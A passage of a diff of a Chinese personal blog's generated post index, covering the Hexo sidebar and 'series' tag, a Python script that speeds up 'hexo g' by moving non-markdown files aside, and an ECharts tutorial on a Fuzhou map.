    e_1.setAttribute("class", "top");
    var e_2 = document.createElement("h1");
    e_2.appendChild(document.createTextNode("春江花月夜"));
    e_1.appendChild(e_2);
    var e_3 = document.createElement("span");
    e_3.appendChild(document.createTextNode("唐·张若虚"));
    e_1.appendChild(e_3);
    e_0.appendChild(e_1);
    var e_4 = document.createElement("p");
    e_4.appendChild(document.createTextNode("\n春江潮水连海平,"));
    var e_5 = document.createElement("br");
    e_4.appendChild(e_5);

    ...

    e_4.appendChild(document.createTextNode("落月摇情满江树。"));
    var e_40 = document.createElement("br");
    e_4.appendChild(e_40);
    e_0.appendChild(e_4);
    return e_0;
    }

    function createNode_3() {
    var e_0 = document.createElement("div");
    e_0.setAttribute("class", "poem aside-card");
    var e_1 = document.createElement("div");
    e_1.setAttribute("class", "top");
    var e_2 = document.createElement("h1");
    e_2.appendChild(document.createTextNode("音乐"));
    e_1.appendChild(e_2);
    var e_3 = document.createElement("div");
    const ap = new APlayer({
    container: e_3,
    audio: [{
    name: '梦之津渡',
    artist: '啃书',
    url: '/musics/梦之津渡.mp3',
    cover: '/musics/梦之津渡.jpg'
    }]
    });
    e_0.appendChild(e_3);
    return e_0;
    }

    $(document).ready(function() {
    document.querySelector(".aside-top").appendChild(createNode_1());
    document.querySelector(".aside-bottom").appendChild(createNode_2());
    var parentElement = document.querySelector(".aside-bottom");
    var firstChild = parentElement.firstChild;
    parentElement.insertBefore(createNode_3(), firstChild);
    });

    ​这段代码可以让你在侧边栏感受中华优秀传统文化!还可以听听音乐!

    ]]>
    + 前言

    ​没错!我又开始瞎鼓捣我的博客了!本次更新了侧边栏功能!便于在正文旁边加点辅助信息,提升阅读体验。

    布局

    post_centent

    post_centent.ejs 的内容如下:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    <div class="post-content">
    <article class="post-content-info">
    <%- page.content %>
    <%- partial('widget/comments'); %>
    </article>
    <% if(page.aside != false) { %>
    <%- partial('_partial/post_aside'); %>
    <% } %>
    </div>

    ​一个 <div class="post-content"> 存储主体信息。

    • <article class="post-content-info"> 正文内容。
    • <%- partial('_partial/post_aside'); %> 侧边栏内容。
      • 如果文章头的参数 aside 设为 false,不创建侧边栏。

    ​当屏幕宽度大于 960px 时,.post-content 使用弹性布局,将侧边栏放在正文内容右边:

    1
    2
    3
    4
    display: flex;
    margin: -100px auto 95px;
    width: 100%;
    justify-content: center;

    ​当屏幕宽度下于 960px 时,将“侧边栏”放在正文内容下边(像 butterfly 那么做):

    1
    flex-direction: column;

    post_aside

    post_aside.ejs 下的内容(简略):

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    <div class="aside">
    <%- js('js/widget/aside.js'); %>
    <script>
    showAside();
    </script>

    <div class="aside-top">
    <div class="aside-top-about aside-card">
    ...
    </div>
    </div>

    <% if(page.series) { %>
    <div class="aside-top-series aside-card">
    ...
    </div>

    <div class="aside-bottom">
    <% if(page.toc) { %>
    ...
    <div class="aside-bottom-toc aside-card">
    ...
    </div>
    <% } %>
    </div>
    </div>

    <div class="aside"> 下有:

    • <div class="aside-top">,这个是相对布局:
    1
    2
    3
    4
    position: relative;
    z-index: 2;
    margin-left: 20px;
    width: min(260px, 20vw);
    • <div class="aside-bottom">,这个是 sticky 布局,主要是让视图滚动时也能显示目录。
    1
    2
    3
    4
    position: sticky;
    top: 80px;
    margin-left: 20px;
    width: min(260px, 20vw);

    aside-card

    1
    2
    3
    4
    5
    6
    7
    width: calc(100% - 20px);
    border-radius: 10px;
    background: var(--background-primary);
    box-shadow: 0 1px 3px hsla(0, 0%, 7%, 0.1);
    padding: 10px;
    border: 1px solid rgba(18, 24, 58, 0.06);
    transition: background 0.3s ease-out;

    ​写一个侧边栏卡片样式。

    Series 标签

    ​我设计了一个新的文章属性:series!据我所知,这个功能还是我独创的。

    1
    series: Hexo

    ​这个 series 的值必须在 tags 里存在,算是一个文章的系列标签,或是我学习一门重要技术时探索的时间线。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    <ol class="series">
    <% let serialNumber = 0; %>
    <% let seriesCount = 0; %>
    <% let find = false; %>
    <% site.posts.sort('date').forEach(function(post) { %>
    <% if (post.series === page.series) { %>
    <% seriesCount += 1; %>
    <% if (!find) {serialNumber += 1;} %>
    <% if (post.path === page.path) { %>
    <% find = true; %>
    <li class="series-item active">
    <a class="series-link active" href="/<%= post.path %>">
    &nbsp;&nbsp;<span class="text"><%= post.title %></span>
    </a>
    </li>
    <% } else { %>
    <li class="series-item">
    <a class="series-link" href="/<%= post.path %>">
    &nbsp;&nbsp;<span class="text"><%= post.title %></span>
    </a>
    </li>
    <% } %>
    <% } %>
    <% }); %>
    </ol>

    ​渲染时会查找所有跟 series 相同的文章并按时间顺序排列后放到侧边栏中,便于读者快速找到其它相关文章。

    自定义侧边栏

    ​现在文章通过 JS 可以自定义侧边栏!原理就是使用 JS 往 <div class="aside-top"><div class="aside-bottom"> 下面插入 <div class="aside-card">

    ​由于渲染顺序的关系,只能在文章属性的 inject.bottom 里设置相应的 JS 逻辑(这个功能是抄 butterfly 的)(虽然把逻辑放到前端会拖慢网页加载速度,但我觉得这么写不会显得那么屎山,而且就这么点代码问题也不大你说是不是)。

    1
    2
    3
    inject:
    bottom:
    - <script type="text/javascript" src="test_aside.js"></script>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    function createNode_1() {
    var e_0 = document.createElement("div");
    e_0.setAttribute("class", "poem aside-card");
    var e_1 = document.createElement("div");
    e_1.setAttribute("class", "top");
    var e_2 = document.createElement("h1");
    e_2.appendChild(document.createTextNode("长安古意"));
    e_1.appendChild(e_2);
    var e_3 = document.createElement("span");
    e_3.appendChild(document.createTextNode("唐·卢照邻"));
    e_1.appendChild(e_3);
    e_0.appendChild(e_1);
    var e_4 = document.createElement("p");
    e_4.appendChild(document.createTextNode("\n长安大道连狭斜,"));
    var e_5 = document.createElement("br");
    e_4.appendChild(e_5);

    ...

    e_4.appendChild(document.createTextNode("飞来飞去袭人裾。"));
    var e_72 = document.createElement("br");
    e_4.appendChild(e_72);
    e_0.appendChild(e_4);
    return e_0;
    }

    function createNode_2() {
    var e_0 = document.createElement("div");
    e_0.setAttribute("class", "poem aside-card");
    var e_1 = document.createElement("div");
    e_1.setAttribute("class", "top");
    var e_2 = document.createElement("h1");
    e_2.appendChild(document.createTextNode("春江花月夜"));
    e_1.appendChild(e_2);
    var e_3 = document.createElement("span");
    e_3.appendChild(document.createTextNode("唐·张若虚"));
    e_1.appendChild(e_3);
    e_0.appendChild(e_1);
    var e_4 = document.createElement("p");
    e_4.appendChild(document.createTextNode("\n春江潮水连海平,"));
    var e_5 = document.createElement("br");
    e_4.appendChild(e_5);

    ...

    e_4.appendChild(document.createTextNode("落月摇情满江树。"));
    var e_40 = document.createElement("br");
    e_4.appendChild(e_40);
    e_0.appendChild(e_4);
    return e_0;
    }

    function createNode_3() {
    var e_0 = document.createElement("div");
    e_0.setAttribute("class", "poem aside-card");
    var e_1 = document.createElement("div");
    e_1.setAttribute("class", "top");
    var e_2 = document.createElement("h1");
    e_2.appendChild(document.createTextNode("音乐"));
    e_1.appendChild(e_2);
    var e_3 = document.createElement("div");
    const ap = new APlayer({
    container: e_3,
    audio: [{
    name: '梦之津渡',
    artist: '啃书',
    url: '/musics/梦之津渡.mp3',
    cover: '/musics/梦之津渡.jpg'
    }]
    });
    e_0.appendChild(e_3);
    return e_0;
    }

    $(document).ready(function() {
    document.querySelector(".aside-top").appendChild(createNode_1());
    document.querySelector(".aside-bottom").appendChild(createNode_2());
    var parentElement = document.querySelector(".aside-bottom");
    var firstChild = parentElement.firstChild;
    parentElement.insertBefore(createNode_3(), firstChild);
    });

    ​这段代码可以让你在侧边栏感受中华优秀传统文化!还可以听听音乐!

    ]]>
    @@ -2386,7 +2386,7 @@ /posts/Hexo-%E5%86%99%E7%82%B9%E5%B7%A5%E5%85%B7%E5%8A%A0%E5%BF%AB%20hexo%20g%20%E7%9A%84%E9%80%9F%E5%BA%A6/ - 前言

    ​博客里 bb 了太多的东西,导致每次执行 hexo cl 后再执行 hexo g 速度都特别慢,而且还会出现 EMFILE: too many open files 这种编译失败的错误!而 问题解答 | Hexo 这个解决方案只对 Linux 有效。必须找个办法修复😡!

    ​不幸运地是,hexo s 还是这么慢……

    解决方案

    ​经过排查,应该是 source/ 下的文件太多了……每次 hexo g 都会处理大量不需要编译的无关文件(没有用图床的弊端),我们只需要让 hexo g 处理 .md 文件就行。

    ​所以我想的是:

    1. source/ 下的无关文件先移动到某个临时文件夹;
    2. 执行 hexo cl,然后执行 hexo g 编译 .md 文件;
    3. 再把这些无关文件移动回 source/public/ 的特定位置即可。

    代码

    ​在博客文件夹根目录下创建一个 ./tools 文件夹,里面创建一个 quick_complie.py,里面写上这些神奇代码!

    python

    导入相关库、定义变量

    import os
    import shutil
    from tqdm import tqdm
    import subprocess
    import yaml

    ignore_folder = ['musics'] # 不处理 source/musics 这个文件夹
    ignore_type = ['md', 'ejs'] # 不处理 .md 和 .ejs 类型的文件

    前处理

    ​下面这段代码会将 source/ 下不需要 hexo g 处理的文件移动到 temp/ 下。

    def move_non_md_files(src, dst):
    os.makedirs(dst, exist_ok=True)
    # 遍历源文件夹中的所有文件和子文件夹
    for item in os.listdir(src):
    # 构建源文件/文件夹的完整路径
    src_item = os.path.join(src, item)
    # 构建目标文件/文件夹的完整路径
    dst_item = os.path.join(dst, item)

    # 如果是文件夹,则递归地复制文件夹
    if os.path.isdir(src_item):
    move_non_md_files(src_item, dst_item)
    # 如果是文件且不是 ignore_type 类型下的文件,则复制文件
    elif os.path.isfile(src_item) and src_item.split('.')[-1] not in ignore_type:
    shutil.move(src_item, dst)


    print("处理文件……")
    if os.path.isdir('../temp'):
    shutil.rmtree('../temp')

    for item in tqdm(os.listdir('../source')):
    if item not in ignore_folder:
    item_path = os.path.join('../source', item)
    # 判断是否为文件夹
    if os.path.isdir(item_path):
    try:
    move_non_md_files(item_path, os.path.join('../temp',item))
    except Exception as e:
    print(item_path + ":", e)

    print("完成!")

    hexo cl & hexo g

    ​使用 python 调用 hexo clhexo g 命令。

    print("hexo cl……")
    print(subprocess.run('hexo cl', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
    print("完成!")
    print("hexo g……")
    print(subprocess.run('hexo g', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
    print("完成!")

    后处理

    ​下面这段代码会将 temp/ 下的文件拷贝回 source/public/ 下的对应位置,最后删除 temp/

    后处理 _posts

    ​对于 _posts 下的文件,temp/public/ 的路径不是一一对应的,要按照对应的规则拷贝。

    print("后处理 _post 文件……")

    md_list = []
    for item in os.listdir('../source/_posts'):
    if item.endswith('.md'):
    md_list.append(item)

    for item in tqdm(md_list):
    try:
    # 读取 Markdown 文件内容
    with open(os.path.join('../source/_posts', item), 'r', encoding='utf-8') as file:
    content = file.read()
    # 解析 YAML 头部信息
    yaml_header, body = content.split('---\n', 2)[1:]
    yaml_data = yaml.safe_load(yaml_header)
    source_folder = '../temp/_posts/' + item[:-3]
    destination_folder = ('../public/' +
    str(yaml_data['date'].year).zfill(2) + '/' +
    str(yaml_data['date'].month).zfill(2) + '/' +
    str(yaml_data['date'].day).zfill(2) + '/' + item[:-3])
    shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True)
    except Exception as e:
    print("shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True): "+ item + ":", e)
    try:
    shutil.copytree(source_folder, os.path.join('../source/_posts', item[:-3]), dirs_exist_ok=True)
    except Exception as e:
    print("shutil.copytree(source_folder, '../source/_posts'): " + item + ":", e)
    print("完成!")

    后处理其它文件

    ​对于 _posts 下的文件,temp/public/ 的路径一一对应的,要按拷贝回去。最后把临时文件夹 temp/ 删了。

    print("后处理其它文件……")
    for item in tqdm(os.listdir('../temp')):
    if item != '_posts' and item not in ignore_folder:
    item_path = os.path.join('../temp', item)
    # 判断是否为文件夹
    if os.path.isdir(item_path):
    try:
    shutil.copytree(item_path, os.path.join('../public', item), dirs_exist_ok=True)
    except Exception as e:
    print(os.path.join('../public', item) + ":", e)
    try:
    shutil.copytree(item_path, os.path.join('../source', item), dirs_exist_ok=True)
    except Exception as e:
    print(os.path.join('../source', item) + ":", e)

    if os.path.isdir('../temp'):
    shutil.rmtree('../temp')

    print("完成!")

    完整代码

    import os
    import shutil
    from tqdm import tqdm
    import subprocess
    import yaml

    ignore_folder = ['musics']
    ignore_type = ['md', 'ejs']


    def move_non_md_files(src, dst):
    os.makedirs(dst, exist_ok=True)
    # 遍历源文件夹中的所有文件和子文件夹
    for item in os.listdir(src):
    # 构建源文件/文件夹的完整路径
    src_item = os.path.join(src, item)
    # 构建目标文件/文件夹的完整路径
    dst_item = os.path.join(dst, item)

    # 如果是文件夹,则递归地复制文件夹
    if os.path.isdir(src_item):
    move_non_md_files(src_item, dst_item)
    # 如果是文件且不是 ignore_type 类型下的文件,则复制文件
    elif os.path.isfile(src_item) and src_item.split('.')[-1] not in ignore_type:
    shutil.move(src_item, dst)


    print("处理文件……")
    if os.path.isdir('../temp'):
    shutil.rmtree('../temp')

    for item in tqdm(os.listdir('../source')):
    if item not in ignore_folder:
    item_path = os.path.join('../source', item)
    # 判断是否为文件夹
    if os.path.isdir(item_path):
    try:
    move_non_md_files(item_path, os.path.join('../temp',item))
    except Exception as e:
    print(item_path + ":", e)

    print("完成!")

    #####################################################

    print("hexo cl……")
    print(subprocess.run('hexo cl', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
    print("完成!")
    print("hexo g……")
    print(subprocess.run('hexo g', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
    print("完成!")

    ######################################################

    ## 后处理 _post 文件

    print("后处理 _post 文件……")

    md_list = []
    for item in os.listdir('../source/_posts'):
    if item.endswith('.md'):
    md_list.append(item)

    for item in tqdm(md_list):
    try:
    # 读取 Markdown 文件内容
    with open(os.path.join('../source/_posts', item), 'r', encoding='utf-8') as file:
    content = file.read()
    # 解析 YAML 头部信息
    yaml_header, body = content.split('---\n', 2)[1:]
    yaml_data = yaml.safe_load(yaml_header)
    source_folder = '../temp/_posts/' + item[:-3]
    destination_folder = ('../public/' +
    str(yaml_data['date'].year).zfill(2) + '/' +
    str(yaml_data['date'].month).zfill(2) + '/' +
    str(yaml_data['date'].day).zfill(2) + '/' + item[:-3])
    shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True)
    except Exception as e:
    print("shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True): "+ item + ":", e)
    try:
    shutil.copytree(source_folder, os.path.join('../source/_posts', item[:-3]), dirs_exist_ok=True)
    except Exception as e:
    print("shutil.copytree(source_folder, '../source/_posts'): " + item + ":", e)
    print("完成!")

    ## 后处理其它文件

    print("后处理其它文件……")
    for item in tqdm(os.listdir('../temp')):
    if item != '_posts' and item not in ignore_folder:
    item_path = os.path.join('../temp', item)
    # 判断是否为文件夹
    if os.path.isdir(item_path):
    try:
    shutil.copytree(item_path, os.path.join('../public', item), dirs_exist_ok=True)
    except Exception as e:
    print(os.path.join('../public', item) + ":", e)
    try:
    shutil.copytree(item_path, os.path.join('../source', item), dirs_exist_ok=True)
    except Exception as e:
    print(os.path.join('../source', item) + ":", e)

    if os.path.isdir('../temp'):
    shutil.rmtree('../temp')

    print("完成!")

    调用 python 文件

    ​写一个 .bat 文件快速调用 quick_complie.py

    @echo off
    python quick_complie.py
    echo 按任意键继续……
    pause
    exit
    ]]>
    + 前言

    ​博客里 bb 了太多的东西,导致每次执行 hexo cl 后再执行 hexo g 速度都特别慢,而且还会出现 EMFILE: too many open files 这种编译失败的错误!而 问题解答 | Hexo 这个解决方案只对 Linux 有效。必须找个办法修复😡!

    ​不幸运地是,hexo s 还是这么慢……

    解决方案

    ​经过排查,应该是 source/ 下的文件太多了……每次 hexo g 都会处理大量不需要编译的无关文件(没有用图床的弊端),我们只需要让 hexo g 处理 .md 文件就行。

    ​所以我想的是:

    1. source/ 下的无关文件先移动到某个临时文件夹;
    2. 执行 hexo cl,然后执行 hexo g 编译 .md 文件;
    3. 再把这些无关文件移动回 source/public/ 的特定位置即可。

    代码

    ​在博客文件夹根目录下创建一个 ./tools 文件夹,里面创建一个 quick_complie.py,里面写上这些神奇代码!

    python

    导入相关库、定义变量

    1
    2
    3
    4
    5
    6
    7
    8
    import os
    import shutil
    from tqdm import tqdm
    import subprocess
    import yaml

    ignore_folder = ['musics'] # 不处理 source/musics 这个文件夹
    ignore_type = ['md', 'ejs'] # 不处理 .md 和 .ejs 类型的文件

    前处理

    ​下面这段代码会将 source/ 下不需要 hexo g 处理的文件移动到 temp/ 下。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    def move_non_md_files(src, dst):
    os.makedirs(dst, exist_ok=True)
    # 遍历源文件夹中的所有文件和子文件夹
    for item in os.listdir(src):
    # 构建源文件/文件夹的完整路径
    src_item = os.path.join(src, item)
    # 构建目标文件/文件夹的完整路径
    dst_item = os.path.join(dst, item)

    # 如果是文件夹,则递归地复制文件夹
    if os.path.isdir(src_item):
    move_non_md_files(src_item, dst_item)
    # 如果是文件且不是 ignore_type 类型下的文件,则复制文件
    elif os.path.isfile(src_item) and src_item.split('.')[-1] not in ignore_type:
    shutil.move(src_item, dst)


    print("处理文件……")
    if os.path.isdir('../temp'):
    shutil.rmtree('../temp')

    for item in tqdm(os.listdir('../source')):
    if item not in ignore_folder:
    item_path = os.path.join('../source', item)
    # 判断是否为文件夹
    if os.path.isdir(item_path):
    try:
    move_non_md_files(item_path, os.path.join('../temp',item))
    except Exception as e:
    print(item_path + ":", e)

    print("完成!")

    hexo cl & hexo g

    ​使用 python 调用 hexo clhexo g 命令。

    1
    2
    3
    4
    5
    6
    print("hexo cl……")
    print(subprocess.run('hexo cl', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
    print("完成!")
    print("hexo g……")
    print(subprocess.run('hexo g', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
    print("完成!")

    后处理

    ​下面这段代码会将 temp/ 下的文件拷贝回 source/public/ 下的对应位置,最后删除 temp/

    后处理 _posts

    ​对于 _posts 下的文件,temp/public/ 的路径不是一一对应的,要按照对应的规则拷贝。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    print("后处理 _post 文件……")

    md_list = []
    for item in os.listdir('../source/_posts'):
    if item.endswith('.md'):
    md_list.append(item)

    for item in tqdm(md_list):
    try:
    # 读取 Markdown 文件内容
    with open(os.path.join('../source/_posts', item), 'r', encoding='utf-8') as file:
    content = file.read()
    # 解析 YAML 头部信息
    yaml_header, body = content.split('---\n', 2)[1:]
    yaml_data = yaml.safe_load(yaml_header)
    source_folder = '../temp/_posts/' + item[:-3]
    destination_folder = ('../public/' +
    str(yaml_data['date'].year).zfill(2) + '/' +
    str(yaml_data['date'].month).zfill(2) + '/' +
    str(yaml_data['date'].day).zfill(2) + '/' + item[:-3])
    shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True)
    except Exception as e:
    print("shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True): "+ item + ":", e)
    try:
    shutil.copytree(source_folder, os.path.join('../source/_posts', item[:-3]), dirs_exist_ok=True)
    except Exception as e:
    print("shutil.copytree(source_folder, '../source/_posts'): " + item + ":", e)
    print("完成!")

    后处理其它文件

    ​对于 _posts 下的文件,temp/public/ 的路径一一对应的,要按拷贝回去。最后把临时文件夹 temp/ 删了。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    print("后处理其它文件……")
    for item in tqdm(os.listdir('../temp')):
    if item != '_posts' and item not in ignore_folder:
    item_path = os.path.join('../temp', item)
    # 判断是否为文件夹
    if os.path.isdir(item_path):
    try:
    shutil.copytree(item_path, os.path.join('../public', item), dirs_exist_ok=True)
    except Exception as e:
    print(os.path.join('../public', item) + ":", e)
    try:
    shutil.copytree(item_path, os.path.join('../source', item), dirs_exist_ok=True)
    except Exception as e:
    print(os.path.join('../source', item) + ":", e)

    if os.path.isdir('../temp'):
    shutil.rmtree('../temp')

    print("完成!")

    完整代码

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    import os
    import shutil
    from tqdm import tqdm
    import subprocess
    import yaml

    ignore_folder = ['musics']
    ignore_type = ['md', 'ejs']


    def move_non_md_files(src, dst):
    os.makedirs(dst, exist_ok=True)
    # 遍历源文件夹中的所有文件和子文件夹
    for item in os.listdir(src):
    # 构建源文件/文件夹的完整路径
    src_item = os.path.join(src, item)
    # 构建目标文件/文件夹的完整路径
    dst_item = os.path.join(dst, item)

    # 如果是文件夹,则递归地复制文件夹
    if os.path.isdir(src_item):
    move_non_md_files(src_item, dst_item)
    # 如果是文件且不是 ignore_type 类型下的文件,则复制文件
    elif os.path.isfile(src_item) and src_item.split('.')[-1] not in ignore_type:
    shutil.move(src_item, dst)


    print("处理文件……")
    if os.path.isdir('../temp'):
    shutil.rmtree('../temp')

    for item in tqdm(os.listdir('../source')):
    if item not in ignore_folder:
    item_path = os.path.join('../source', item)
    # 判断是否为文件夹
    if os.path.isdir(item_path):
    try:
    move_non_md_files(item_path, os.path.join('../temp',item))
    except Exception as e:
    print(item_path + ":", e)

    print("完成!")

    #####################################################

    print("hexo cl……")
    print(subprocess.run('hexo cl', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
    print("完成!")
    print("hexo g……")
    print(subprocess.run('hexo g', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
    print("完成!")

    ######################################################

    ## 后处理 _post 文件

    print("后处理 _post 文件……")

    md_list = []
    for item in os.listdir('../source/_posts'):
    if item.endswith('.md'):
    md_list.append(item)

    for item in tqdm(md_list):
    try:
    # 读取 Markdown 文件内容
    with open(os.path.join('../source/_posts', item), 'r', encoding='utf-8') as file:
    content = file.read()
    # 解析 YAML 头部信息
    yaml_header, body = content.split('---\n', 2)[1:]
    yaml_data = yaml.safe_load(yaml_header)
    source_folder = '../temp/_posts/' + item[:-3]
    destination_folder = ('../public/' +
    str(yaml_data['date'].year).zfill(2) + '/' +
    str(yaml_data['date'].month).zfill(2) + '/' +
    str(yaml_data['date'].day).zfill(2) + '/' + item[:-3])
    shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True)
    except Exception as e:
    print("shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True): "+ item + ":", e)
    try:
    shutil.copytree(source_folder, os.path.join('../source/_posts', item[:-3]), dirs_exist_ok=True)
    except Exception as e:
    print("shutil.copytree(source_folder, '../source/_posts'): " + item + ":", e)
    print("完成!")

    ## 后处理其它文件

    print("后处理其它文件……")
    for item in tqdm(os.listdir('../temp')):
    if item != '_posts' and item not in ignore_folder:
    item_path = os.path.join('../temp', item)
    # 判断是否为文件夹
    if os.path.isdir(item_path):
    try:
    shutil.copytree(item_path, os.path.join('../public', item), dirs_exist_ok=True)
    except Exception as e:
    print(os.path.join('../public', item) + ":", e)
    try:
    shutil.copytree(item_path, os.path.join('../source', item), dirs_exist_ok=True)
    except Exception as e:
    print(os.path.join('../source', item) + ":", e)

    if os.path.isdir('../temp'):
    shutil.rmtree('../temp')

    print("完成!")

    调用 python 文件

    ​写一个 .bat 文件快速调用 quick_complie.py

    1
    2
    3
    4
    5
    @echo off
    python quick_complie.py
    echo 按任意键继续……
    pause
    exit
    ]]>
    @@ -2413,7 +2413,7 @@ /posts/Web-ECharts%20%E5%9C%B0%E5%9B%BE%E5%8F%AF%E8%A7%86%E5%8C%96/ - 资源

    演示

    福州市

    创建地图

    获取 SVG

    福州市.svg

    ​从 DataV.GeoAtlas 地理小工具系列 (aliyun.com) 获取 福州市.svg

    Ai

    ​将 福州市.svg 导入 Ai 处理一下。

    文档设置

    ​将画板单位选为 像素。为了保证贴图的清晰度,这里将画板设为 5000px x 3000px

    调整图像

    ​把地图里的填充删了。自由变换地图,让地图放在画板中心并尽可能大。

    另存为

    ​这么设置以另存为 SVG。

    修改

    ​修改导出的 SVG 代码,把 id 都改成 name,这样 ECharts 才可以识别。

    PS

    ​用 Ai 再导出两张 png,方便 PS 操作!

    png

    ​先直接导出一张 png。

    png

    ​给各个区县填充,再导出一张 png(真像分割任务里的分割图)。

    webp

    ​根据 Ai 导出的两张 png,用 PS 做好背景贴图。

    HTML

    ​创建一个容器:

    <div id="chart" style="width: 100%; height: 400px; margin: 0 auto; margin-top: 1em; margin-bottom: 1em;"></div>

    ​JS 中导入 ECharts:

    <script src="XXX/echarts.min.js"></script>

    ​再写一个 JS 控制这个 <div id="chart"></div>(这里还不太熟练,抄抄别人的,然后看看官方文档,问问 ChatGPT,拼凑出如下臭臭代码):

    var dom = document.getElementById('chart');
    var myChart = echarts.init(dom, null, {
    renderer: 'canvas',
    useDirtyRect: false
    });
    var app = {};
    var option;

    var img = new Image();
    img.src = 'Fuzhou.webp';

    img.onload = function () {
    $.get(
    'Fuzhou.svg',
    function (svg) {
    echarts.registerMap('sicily', { svg: svg });
    option = {
    tooltip: {},
    geo: [
    {
    map: 'sicily',
    roam: true,
    layoutCenter: ['50%', '50%'],
    layoutSize: '150%',
    selectedMode: 'single',
    itemStyle: {
    color: undefined
    },
    emphasis: {
    itemStyle: {
    color: 'rgba(0, 255, 255, 0.25)',
    },
    label: {
    show: false
    }
    },
    selectedMode: false,

    regions: [
    {
    //地图区域的名称
    name: "福州市",
    // 该区域的多边形样式设置
    itemStyle: {
    areaColor: {
    type: 'image',
    image: img,
    repeat: 'no-repeat',
    },
    borderColor: '#111',
    //图形阴影的模糊大小
    shadowBlur: 5,
    //阴影颜色
    shadowColor: "#000",
    //shadowOffsetY
    shadowOffsetY: 5,
    //透明度
    opacity: 1
    },
    emphasis: {
    itemStyle: {
    areaColor: {
    type: 'image',
    image: img,
    repeat: 'no-repeat',
    },
    borderColor: '#111',
    shadowBlur: 5,
    shadowColor: "#000",
    shadowOffsetY: 5,
    opacity: 1
    },
    },
    tooltip: {
    show: true,
    confine: true,
    formatter: function () {
    return [];
    }
    }
    },
    {
    name: "鼓楼区",
    tooltip: {
    show: true,
    confine: true,
    formatter: function () {
    return [
    '鼓楼区',
    '啊!三坊七巷真是太好玩了!'
    ].join('<br/>');
    }
    }
    },
    {
    name: "仓山区",
    tooltip: {
    show: true,
    confine: true,
    formatter: function () {
    return [
    '仓山区',
    '我们的时代多美好~像朝霞漫天灿烂~'
    ].join('<br/>');
    }
    }
    },
    {
    name: "闽侯县",
    tooltip: {
    show: true,
    confine: true,
    formatter: function () {
    return [
    '闽侯县',
    '知明行笃~立诚致广~全面求发展~'
    ].join('<br/>');
    }
    }
    },
    {
    name: "长乐区",
    tooltip: {
    show: true,
    confine: true,
    formatter: function () {
    return [
    '长乐区',
    '闽江江水都流向~流向长乐的海~'
    ].join('<br/>');
    }
    }
    },
    ]
    }
    ],
    };
    myChart.setOption(option);
    myChart.on('selectchanged', function (params) {
    if (!params.selected.length) {
    myChart.dispatchAction({
    type: 'hideTip'
    });
    myChart.dispatchAction({
    type: 'geoSelect',
    geoIndex: 0
    // Use no name to unselect.
    });
    } else {
    var btnDataIdx = params.selected[0].dataIndex[0];
    var name = option.series.data[btnDataIdx][2];
    myChart.dispatchAction({
    type: 'geoSelect',
    geoIndex: 0,
    name: name
    });
    myChart.dispatchAction({
    type: 'showTip',
    geoIndex: 0,
    name: name
    });
    }
    });
    }
    );

    if (option && typeof option === 'object') {
    myChart.setOption(option);
    }

    myChart.on('click', function (params) {
    // 获取选中项的宽度和高度
    console.log("选中项: ", params.event);
    });

    window.addEventListener('resize', myChart.resize);
    };
    ]]>
    + 资源

    演示

    福州市

    创建地图

    获取 SVG

    福州市.svg

    ​从 DataV.GeoAtlas 地理小工具系列 (aliyun.com) 获取 福州市.svg

    Ai

    ​将 福州市.svg 导入 Ai 处理一下。

    文档设置

    ​将画板单位选为 像素。为了保证贴图的清晰度,这里将画板设为 5000px x 3000px

    调整图像

    ​把地图里的填充删了。自由变换地图,让地图放在画板中心并尽可能大。

    另存为

    ​这么设置以另存为 SVG。

    修改

    ​修改导出的 SVG 代码,把 id 都改成 name,这样 ECharts 才可以识别。

    PS

    ​用 Ai 再导出两张 png,方便 PS 操作!

    png

    ​先直接导出一张 png。

    png

    ​给各个区县填充,再导出一张 png(真像分割任务里的分割图)。

    webp

    ​根据 Ai 导出的两张 png,用 PS 做好背景贴图。

    HTML

    ​创建一个容器:

    1
